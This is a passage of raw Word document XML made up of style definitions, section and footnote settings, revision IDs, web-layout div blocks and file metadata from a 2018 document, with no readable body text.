            <wp:extent cx="6411433" cy="2252980"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="709" name="Picture 709" descr="https://lh6.googleusercontent.com/9Rqk_hUduXjSjJP20b-Vb36r-7VdL8i4mRoSRhsUHlLqQpEyt_wFlusznuLgLPyLKyCa3mhidXmWj5CW_kvn9rMo9QiAX44MqtYeyEE85sJiQJZrVsoZTwEioM9mBhMSmEiw3E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9Rqk_hUduXjSjJP20b-Vb36r-7VdL8i4mRoSRhsUHlLqQpEyt_wFlusznuLgLPyLKyCa3mhidXmWj5CW_kvn9rMo9QiAX44MqtYeyEE85sJiQJZrVsoZTwEioM9mBhMSmEiw3Ez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521" cy="2272689"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD9940B" w14:textId="55113E4A" w:rsidR="00392A5B" w:rsidRPr="00447E87" w:rsidRDefault="00392A5B" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118F83FD" w14:textId="77777777" w:rsidR="00392A5B" w:rsidRPr="00447E87" w:rsidRDefault="00392A5B" w:rsidP="00392A5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00392A5B" w:rsidRPr="00447E87">
      <w:headerReference w:type="default" r:id="rId22"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="777" w:right="567" w:bottom="777" w:left="1134"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F0263" w14:textId="77777777" w:rsidR="000B1381" w:rsidRDefault="000B1381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2AB917E5" w14:textId="77777777" w:rsidR="000B1381" w:rsidRDefault="000B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C356" w14:textId="77777777" w:rsidR="000B1381" w:rsidRDefault="000B1381">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2E488046" w14:textId="77777777" w:rsidR="000B1381" w:rsidRDefault="000B1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395F" w14:textId="77777777" w:rsidR="002F62FD" w:rsidRDefault="002F62FD">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9ED"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D61C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4313E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8B8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D7752"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C7B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7F5CD1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7D14F9AA"/>
    <w:lvl w:ilvl="0" w:tplc="B27A99F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A8"/>
    <w:rsid w:val="00033C61"/>
    <w:rsid w:val="00043F4A"/>
    <w:rsid w:val="00083666"/>
    <w:rsid w:val="00092C2C"/>
    <w:rsid w:val="0009782B"/>
    <w:rsid w:val="000B1381"/>
    <w:rsid w:val="001139C3"/>
    <w:rsid w:val="00114555"/>
    <w:rsid w:val="001464F7"/>
    <w:rsid w:val="00165EB2"/>
    <w:rsid w:val="00224FC8"/>
    <w:rsid w:val="00233202"/>
    <w:rsid w:val="002351BD"/>
    <w:rsid w:val="00263190"/>
    <w:rsid w:val="002D3240"/>
    <w:rsid w:val="002D37D6"/>
    <w:rsid w:val="002F05F7"/>
    <w:rsid w:val="002F62FD"/>
    <w:rsid w:val="0030194A"/>
    <w:rsid w:val="00302234"/>
    <w:rsid w:val="00327B27"/>
    <w:rsid w:val="00332F18"/>
    <w:rsid w:val="00361841"/>
    <w:rsid w:val="00372938"/>
    <w:rsid w:val="00384EB1"/>
    <w:rsid w:val="00392A5B"/>
    <w:rsid w:val="003D346E"/>
    <w:rsid w:val="00446F28"/>
    <w:rsid w:val="00447E87"/>
    <w:rsid w:val="0045446A"/>
    <w:rsid w:val="00475597"/>
    <w:rsid w:val="00480ECA"/>
    <w:rsid w:val="0048578D"/>
    <w:rsid w:val="004A43DE"/>
    <w:rsid w:val="004E2400"/>
    <w:rsid w:val="004F7124"/>
    <w:rsid w:val="00510570"/>
    <w:rsid w:val="0052596B"/>
    <w:rsid w:val="005357F3"/>
    <w:rsid w:val="0058535E"/>
    <w:rsid w:val="00616900"/>
    <w:rsid w:val="006B2199"/>
    <w:rsid w:val="006C3191"/>
    <w:rsid w:val="006F79F2"/>
    <w:rsid w:val="0070676B"/>
    <w:rsid w:val="007238F6"/>
    <w:rsid w:val="007637F7"/>
    <w:rsid w:val="0077667B"/>
    <w:rsid w:val="007944AD"/>
    <w:rsid w:val="007A0331"/>
    <w:rsid w:val="007C64F5"/>
    <w:rsid w:val="007F615A"/>
    <w:rsid w:val="00820F86"/>
    <w:rsid w:val="00843A45"/>
    <w:rsid w:val="00861030"/>
    <w:rsid w:val="00866051"/>
    <w:rsid w:val="0095127F"/>
    <w:rsid w:val="00A1723B"/>
    <w:rsid w:val="00A51B16"/>
    <w:rsid w:val="00A8735F"/>
    <w:rsid w:val="00B4601B"/>
    <w:rsid w:val="00BB1BAB"/>
    <w:rsid w:val="00C117BD"/>
    <w:rsid w:val="00C45784"/>
    <w:rsid w:val="00C4644E"/>
    <w:rsid w:val="00C576A8"/>
    <w:rsid w:val="00C76B9F"/>
    <w:rsid w:val="00CA0D70"/>
    <w:rsid w:val="00CA241E"/>
    <w:rsid w:val="00CC5BC2"/>
    <w:rsid w:val="00D53833"/>
    <w:rsid w:val="00D71D9F"/>
    <w:rsid w:val="00D80E7C"/>
    <w:rsid w:val="00DB25D2"/>
    <w:rsid w:val="00E131C2"/>
    <w:rsid w:val="00E37AE8"/>
    <w:rsid w:val="00E4609C"/>
    <w:rsid w:val="00E64FB2"/>
    <w:rsid w:val="00E856C2"/>
    <w:rsid w:val="00EE1D6A"/>
    <w:rsid w:val="00EE5882"/>
    <w:rsid w:val="00F12A5A"/>
    <w:rsid w:val="00F84083"/>
    <w:rsid w:val="00FA7394"/>
    <w:rsid w:val="00FF58D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A940"/>
  <w15:docId w15:val="{B21D0DF7-8868-41C2-8D10-6CE4E541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533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34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0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D07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22092"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="009B14FE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:qFormat/>
    <w:rsid w:val="009B14FE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005334C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5334C9"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="InternetLink">
    <w:name w:val="Internet Link"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005D07A2"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="005D07A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5D07A2"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HTMLPreformattedChar">
    <w:name w:val="HTML Preformatted Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTMLPreformatted"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:rsid w:val="00FF1B00"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="006873CB"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="006873CB"/>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cs="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel38">
    <w:name w:val="ListLabel 38"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListLabel39">
    <w:name w:val="ListLabel 39"/>
    <w:qFormat/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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22092"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B14FE"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009B14FE"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="005D07A2"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005D07A2"/>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FF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25521"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00125521"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00125521"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00244769"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00384EB1"/>
    <w:rPr>
      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="apple-tab-span">
    <w:name w:val="apple-tab-span"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="002F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490">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="33043326">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="115570073">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="149248954">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="155267730">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="208029823">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="227152533">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="252129742">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="271011163">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="271011924">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="293215457">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="358169649">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="376201741">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="761804274">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="782961359">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="836044702">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="861940439">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="881478874">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1091396596">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1130130688">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1181432429">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1336683988">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1605768063">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1898200793">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1999992403">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2111927639">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="212121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C270-0366-4789-857D-78613F04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cute</dc:creator>
  <dc:description/>
  <cp:lastModifiedBy>tran xuan thoi</cp:lastModifiedBy>
  <cp:revision>371</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-23T16:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-23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